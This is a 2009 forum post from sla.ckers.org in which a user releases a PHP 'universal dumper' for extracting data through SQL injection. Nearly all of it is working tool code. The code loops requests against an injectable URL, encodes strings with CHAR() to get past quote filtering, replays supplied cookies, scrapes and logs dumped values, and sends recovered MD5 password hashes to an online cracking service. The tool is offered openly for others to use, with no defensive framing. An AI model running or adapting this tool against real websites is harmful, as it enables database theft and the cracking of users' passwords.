Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
universal dumper (for sql injections)
Posted by: Kyo
Date: April 20, 2009 02:57PM

I posted this in another thread, so I figured I might as well do a semi-official release here. Basically this tool will dump data for you out of sql injections returning only a single column or whatever. It's written (sloppily) in PHP. Feel free to improve, alter or distribute it (just don't ask for money, and give a backlink to http://wocares.com/ )

Anyway:

<?php

set_time_limit(0);

ini_set("error_reporting", "E_ALL");

ini_set("display_errors", "1");

error_reporting(E_ALL);

function addzeros($x,$os = 2,$sign = "0") {
$x = (string) $x;
$strlen = strlen($x);
for($i = $strlen;$i < $os;$i++) $x = $sign.$x;
return $x;
}
function noquote($string) {
$newstring = "";
while($string) {
$newstring .= ord($string);
$string = substr($string, 1);
if($string) {
$newstring .=",";
}
}
$newstring = "CHAR(".$newstring.")";
return $newstring;
}

function getinbetween($front,$end,$string) {
$frontpos = strpos($string,$front);
if($frontpos !== false) $endpos = strpos(substr($string,$frontpos+strlen($front)),$end);
if($frontpos !== false && $endpos !== false) {
return substr($string,($frontpos+strlen($front)),$endpos);
} else return false;
}

function getmd5raw($md5) {
$gdata = file_get_contents("http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5);
if(!$gdata) $gdata = file_get_contents("http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5);
return $raw = getinbetween("<td width=\"35%\"><b>","</b></td>",$gdata);
}

function get_date($time) {
return date("r",$time);
}

if($_POST) {
if(get_magic_quotes_gpc()) {
foreach($_POST as $key => $var) {
$_POST[$key] = stripslashes($var);
}
}
echo "<pre>";
$regexouter = "#";
$regexflags = "is";
$url = $_POST['url'];
$times = (int)$_POST['times'];
$i1s = (int)$_POST['i1s'];
$i1i = (int)$_POST['i1i'];
$i2s = (int)$_POST['i2s'];
$i2i = (int)$_POST['i2i'];
$r1s = (int)$_POST['r1s'];
$cookies = str_replace(array("\r","\n"),"",$_POST['cookies']);
$filename = str_replace("/","",$_POST['filename']);
$formfile = str_replace("/","",$_POST['formfile']);
if(!$formfile) $formfile = "form_".time().".htm";
if(!$filename) $filename = "log_".time().".txt";
$r1e = (int)$_POST['r1e'];
$s1 = empty($_POST['s1chr']) ? urlencode($_POST['s1']) : urlencode(noquote($_POST['s1']));
$s2 = empty($_POST['s2chr']) ? urlencode($_POST['s2']) : urlencode(noquote($_POST['s2']));
$s3 = empty($_POST['s3chr']) ? urlencode($_POST['s3']) : urlencode(noquote($_POST['s3']));
$getstuff = explode("\n",str_replace("\r","",$_POST['getstuff']));
$getstuffend = explode("\n",str_replace("\r","",$_POST['getstuffend']));
$getstuffnames = explode("\n",str_replace("\r","",$_POST['getstuffnames']));
$getstuffmod = explode("\n",str_replace("\r","",$_POST['getstuffmodifiers']));
if(count($getstuffend) > count($getstuff)) $max = count($getstuffend);
else $max = count($getstuff);

for($i = 0; $i < $max;$i++) {
if($getstuff[$i] && $getstuffend[$i]) {
$matches[] = array(
'start' => $getstuff[$i],
'end' => $getstuffend[$i],
'name' => $getstuffnames[$i],
'modifier' => strtoupper($getstuffmod[$i])
);
}
}

print_r($matches);
print_r($_POST);
$formcontent = '
<form method="POST" action="'.htmlspecialchars($_SERVER['SCRIPT_NAME']).'">
URL: <input type="text" size="40" name="url" value="'.htmlspecialchars($_POST['url']).'"> (you can use any of the variables below like [I1] )<br>
logfile: <input type="text" size="40" name="filename" value="'.htmlspecialchars($_POST['filename']).'"> <br>
save form? <input type="checkbox" name="saveform" value="1">
form name: <input type="text" size="40" name="formname" value=""> <br>
Cookies: <input type="text" size="40" name="cookies" value="'.htmlspecialchars($_POST['cookies']).'"> <br>
add seperator between data loops? <input type="checkbox" name="seperator" value="1" '.($_POST['seperator'] ? "CHECKED" : "").'><br>
loop <input type="text" size="3" name="times" value="'.htmlspecialchars($_POST['times']).'"> times<br>
Increasing variables:<br>
Increasing 1 - [I1]: start: <input type="text" name="i1s" value="'.htmlspecialchars($_POST['i1s']).'"> increment rate: <input type="text" name="i1i" value="'.htmlspecialchars($_POST['i1i']).'"><br>
Increasing 2 - [I2]: start: <input type="text" name="i2s" value="'.htmlspecialchars($_POST['i2s']).'"> increment rate: <input type="text" name="i2i" value="'.htmlspecialchars($_POST['i2i']).'"><br>
Unchangable variables:<br>
Random 1 - [R1]: from<input type="text" name="r1s" value="'.htmlspecialchars($_POST['r1s']).'"> to <input type="text" name="r1e" value="'.htmlspecialchars($_POST['r1e']).'"><br>
Static variables: (these are so you can change parts of the query (like a where clause) more easily)<br>
Static 1 - [S1]: <input type="text" name="s1" value="'.htmlspecialchars($_POST['s1']).'"> <input type="checkbox" name="s1chr" '.($_POST['s1chr'] ? "CHECKED" : "").'> Encode with CHAR()<br>
Static 2 - [S2]: <input type="text" name="s2" value="'.htmlspecialchars($_POST['s2']).'"> <input type="checkbox" name="s2chr" '.($_POST['s2chr'] ? "CHECKED" : "").'> Encode with CHAR()<br>
Static 3 - [S3]: <input type="text" name="s3" value="'.htmlspecialchars($_POST['s3']).'"> <input type="checkbox" name="s3chr" '.($_POST['s3chr'] ? "CHECKED" : "").'> Encode with CHAR()<br>
<hr>
data to get from the page: (this works based on getting stuff between two strings)<br>
It will get stuff inbetween the first line of the first textarea and the first line of the second textarea, the second line of the first and the second line of the second, etc.<br>third row is names.<br>
<textarea name="getstuff" cols="40" rows="20">'.htmlspecialchars($_POST['getstuff']).'</textarea><textarea name="getstuffend" cols="40" rows="20">'.htmlspecialchars($_POST['getstuffend']).'</textarea><textarea name="getstuffnames" cols="40" rows="20">'.htmlspecialchars($_POST['getstuffnames']).'</textarea>
<input type="submit" value="dump"><br>
</form>';

echo $formcontent;
if($_POST['saveform']) {echo "yes, save form";
file_put_contents($formfile,$formcontent);
}

$i1 = $i1s;
$i2 = $i2s;

file_put_contents($filename,"Time: ".time()." #: ".$times.":\n".print_r($_POST,true)."\n\n\n");
$nodata = false;
$urldata = parse_url($url);
$path = $urldata['path']."?".($urldata['query'] ? $urldata['query'] : "");
$host = $urldata['host'];
for($i = 1;$i <= $times;$i++) {
$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

if(!$fpx) {
sleep(6);

$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

}
if(!$fpx) {
sleep(6);

$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

}

if(!$fpx) {
sleep(120);

$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

}
if($fpx) {
$thispath = str_replace("[I1]",$i1,str_replace("[I2]",$i2,str_replace("[R1]",rand($r1s,$r1e),str_replace("[S1]",$s1,str_replace("[S2]",$s2,str_replace("[S3]",$s3,$path))))));
$fpxdata = "GET ".$thispath." HTTP/1.0
Host: ".$host."
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: ".$cookies."
Cache-Control: max-age=0

";

if($i == 1) echo $fpxdata;
fwrite($fpx, $fpxdata);



$data2 = "";

while (!feof($fpx)) {

$data2 .= fgets($fpx,128);

}
if(!$data2 && $nodata == false) {
$i--;
$i1 = $i1 - $i1i;
$i2 = $i2 - $i2i;
$nodata = true;

} elseif($nodata == true) $nodata = false;
fclose($fpx);

if($i == 1) echo "<textarea cols=\"80\" rows=\"20\">".htmlentities($data2)."</textarea><br>";
$x = 1;
foreach($matches as $tomatch) {
$match[$x] = getinbetween($tomatch['start'],$tomatch['end'],$data2);
if($match[$x]) {
if($tomatch['modifier'] == "MD5") {
$raw = getmd5raw($match[$x]);
if($raw) {
$match[$x] = $match[$x]." (".$raw.")";
}
} elseif($tomatch['modifier'] == "DATE") {
$match[$x] = $match[$x]." (".get_date((int)$match[$x]).")";
}
}
file_put_contents($filename,addzeros($i,6).": ".addzeros($x,2).": ".addzeros($tomatch['name'],12," ")." : ".$match[$x]."\n",FILE_APPEND);
$x++;
}
if(isset($_POST['seperator']))
file_put_contents($filename,"################################################\n",FILE_APPEND);
//echo $data2;
}
$i1 = $i1 + $i1i;
$i2 = $i2 + $i2i;
}
} else {
?>
<form method="POST" action="index.php">
URL: <input type="text" size="40" name="url"> (you can use any of the variables below like [I1] )<br>
logfile: <input type="text" size="40" name="filename" value="logfile_<?php echo time(); ?>.txt"> <br>
Cookies: <input type="text" size="40" name="cookies" value=""> <br>
save form? <input type="checkbox" name="saveform" value="1">
form name: <input type="text" size="40" name="formname" value="form_<?php echo time(); ?>.htm"> <br>
add seperator between data loops? <input type="checkbox" name="seperator" value="1"><br>
loop <input type="text" size="3" name="times" value="1"> times<br>
Increasing variables:<br>
Increasing 1 - [I1]: start: <input type="text" name="i1s"> increment rate: <input type="text" name="i1i"><br>
Increasing 2 - [I2]: start: <input type="text" name="i2s"> increment rate: <input type="text" name="i2i"><br>
Unchangable variables:<br>
Random 1 - [R1]: from<input type="text" name="r1s"> to <input type="text" name="r1e"><br>
Static variables: (these are so you can change parts of the query (like a where clause) more easily)<br>
Static 1 - [S1]: <input type="text" name="s1"> <input type="checkbox" name="s1chr"> Encode with CHAR()<br>
Static 2 - [S2]: <input type="text" name="s2"> <input type="checkbox" name="s1chr"> Encode with CHAR()<br>
Static 3 - [S3]: <input type="text" name="s3"> <input type="checkbox" name="s1chr"> Encode with CHAR()<br>
<hr>
data to get from the page: (this works based on getting stuff between two strings)<br>
It will get stuff inbetween the first line of the first textarea and the first line of the second textarea, the second line of the first and the second line of the second, etc.<br>third row is names.<br>
fourth row = modifiers. MD5 = look up on gdata, DATE = convert to real date
<table style="width:100%;"><tr>
<td><textarea name="getstuff" style="width:100%; height:400px;"></textarea></td>
<td><textarea name="getstuffend" style="width:100%; height:400px;"></textarea></td>
<td><textarea name="getstuffnames" style="width:100%; height:400px;"></textarea></td>
<td><textarea name="getstuffmodifiers" style="width:100%; height:400px;"></textarea></td>
</tr></table>
<input type="submit" value="dump"><br>
</form>
<?php
}
?>



Edited 1 time(s). Last edit at 04/20/2009 02:58PM by Kyo.

Options: ReplyQuote


Sorry, only registered users may post in this forum.